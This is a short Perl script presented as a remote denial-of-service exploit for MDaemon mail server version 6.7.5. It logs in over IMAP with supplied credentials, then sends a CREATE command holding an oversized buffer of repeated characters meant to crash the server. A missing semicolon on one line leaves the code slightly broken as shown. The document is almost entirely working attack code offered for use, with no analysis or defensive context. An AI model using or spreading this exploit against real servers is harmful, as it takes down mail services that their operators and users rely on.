|
#!/usr/bin/perl ############### #MDaemon SMTP/POP/IMAP server v.6.7.5 #Remote DoS exploit ##Edit this stuff: $host = "imap_server"; $port = "143"; $login = "login"; $pass = "pass"; #Attention! If exploit doesn't #work, change this: $data = "A"; ############### use IO::Socket; $num = "1000"; $buf .= $data x $num; print "Connecting... "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print " OK\n" print "Attacking... "; print $socket "DHGroup Login $login $pass\n"; sleep(1); print $socket "DHGroup CREATE $buf\n"; sleep(1); print " OK\n"; print "Exiting... \n"; close($socket); ##//www.dhgroup.org// #EOF